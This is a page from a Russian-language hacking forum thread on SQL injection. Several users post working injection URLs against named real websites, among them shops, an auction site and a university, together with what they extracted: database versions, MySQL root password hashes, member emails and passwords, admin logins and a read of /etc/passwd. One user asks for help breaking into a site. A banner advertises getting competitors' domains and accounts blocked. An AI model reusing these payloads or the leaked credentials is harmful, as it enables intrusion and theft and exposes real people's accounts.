УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 364 из 1242

364

Опции темы

Поиск в этой теме

Опции просмотра

#3631

10.11.2007, 12:45

Elvis000

Moderator - Level 7

Регистрация: 23.04.2007

Сообщений: 646

Провел на форуме:
4901399

Репутация: 1035

Журнал Системный Администратор av5.com

Код:

http://av5.com/?action=jns,read,choose_issue&journalid=1&choose_year=-1+union+select+1/*

одна колонка, где выводится информация не нашел.

#3632

10.11.2007, 13:55

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

Цитата:

_http://www.petsby.com/articles.php?id=22+union+select+1,2,3,4,5/*
_http://www.petsby.com/articles.php?id=-22+union+select+1,2,version(),4,5/*

================================================== ========================
Tables:

_cities
accaunts
61636361756e7473
accaunts3
61636361756e747333
================================================== =========================

Цитата:

_http://www.petsby.com/articles.php?id=-22+union+select+1,2,column_name,4,5+from+informati on_schema.columns+where+table_name=0x61636361756e7 473+limit+1,1

patronymic_name
password

Цитата:

_http://www.petsby.com/articles.php?id=-22+union+select+1,2,concat_ws(0x3a,patronymic_name ,password),4,5+from+accaunts3

================================================== =========================
shnyga:shnyga
================================================== =========================

#3633

10.11.2007, 15:11

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

http://www.oneway-uk.com/ Аукцион

Код:

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--

4.1.15-Debian_1-log

neway:root@oneway.oneway.co.nz

Код:

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat(user,0x3a,password),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+mysql.user+limit+0,1--

root:74e47d975f1a9f72:stiltskin
debian-sys-maint:0c1b789c7af5d9ca

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat(pass word,0x3a,email),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+f rom+member+limit+1,1--
...
dvtamde7:dmay66@xtra.co.nz
....

Код:

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--

интересные файлы для инклуида и изучения
/var/www/protected/includes/memberarchive.inc
/var/www/protected/includes/auction.inc
/var/www/protected/includes/ledger.inc
/var/www/protected/includes/profile.inc
/var/www/protected/includes/store.inc
/var/www/protected/includes/alert.inc
/var/www/protected/includes/team.inc
/var/www/protected/includes/stats.inc

#3634

10.11.2007, 17:58

KEHT33

Познающий

Регистрация: 26.11.2006

Сообщений: 49

Провел на форуме:
65459

Репутация: 79

Код HTML:

http://edu.ascon.ru/order.php?id=-34+UNION+SELECT+1,2,concat(username,0x2c,userpass),4,5+FROM+poll_user/*

БД 5
admin:81dc9bdb52d04dc20036dbd8313ed055:1234

#3635

10.11.2007, 19:11

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

Провел на форуме:
189215

Репутация: 86

www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order =
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'

Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Объясните что делать дальше, можете даже снять видео про взлом этого сайта =)

#3636

10.11.2007, 19:21

KEHT33

Познающий

Регистрация: 26.11.2006

Сообщений: 49

Провел на форуме:
65459

Репутация: 79

Интернет-маркетинг и раскрутка сайтов

Код HTML:

http://www.vanta.ru/script/catalog.php?cat=-44+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*

БД 4
Если кто найдёт таблицы....отпишитесь

#3637

10.11.2007, 21:09

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

brahms.ro

Код:

http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,aes_decrypt(aes_encrypt(version(),0x71),0x71),aes_decrypt(aes_encrypt(database(),0x71),0x71),aes_decrypt(aes_encrypt(user(),0x71),0x71)),11,12,13/*

4.1.12:b2:root@localhost
А дальше нужна подсказка...
Почему-то можно посмотреть user из mysql.user:

Код:

http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(user,0x71),0x71),11,12,13+from+mysql.user+limit+1,1/*

но ничего не отображается в поле password:

Код:

http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(password,0x71),0x71),11,12,13+from+mysql.user+limit+1,1/*

неужели нет пароля на рута..?!

#3638

10.11.2007, 21:20

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

quickgifts.com
version: Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name: dbLogins
user: qglogin
В поле email:

Код:

1' or 1=(SELECT TOP 1 password FROM tblusers)--

email: dshifley@quickgifts.com
password: ZHNoaWZsZXk=
Или так:
email: ' or 1=1--
password: любой

whalesdirect.com

Код:

http://www.whalesdirect.com/product.html?t_q=FT305'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),email,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users+--+

4.1.20:crt@localhost:whalesdirect_com

email:steve@tshirtriot.com
password:h0bbes
Куда вводить не нашел

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#3639

10.11.2007, 22:04

FoxMALDER

Познающий

Регистрация: 26.07.2007

Сообщений: 50

Провел на форуме:
177050

Репутация: 62

mdgu.com.ua - Мариупольский Государственный Гуманитарный Университет
5.0.27-standard-logmdgu2006_mdgumdgu2006_mdgu@localhost

Код:

http://www.mdgu.com.ua/ua/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x05,version(),database(),user()),6,7,8,9/*

То что нашел...

news
photogallery
rectorat
faculty
specialty
profkom
professors
administration
links_univer
links
elpublic
lang
Таблицу пользователей не нашел, а админка тут.

#3640

10.11.2007, 22:09

K1nD[e]R

Участник форума

Регистрация: 16.06.2007

Сообщений: 133

Провел на форуме:
1877761

Репутация: 237

Отправить сообщение для K1nD[e]R с помощью ICQ

Код:

http://zvezda.ru/file.php?id=-166+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11/*

4.1.20/zvezdaDB/webuzer@localhost

Страница 364 из 1242

364

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход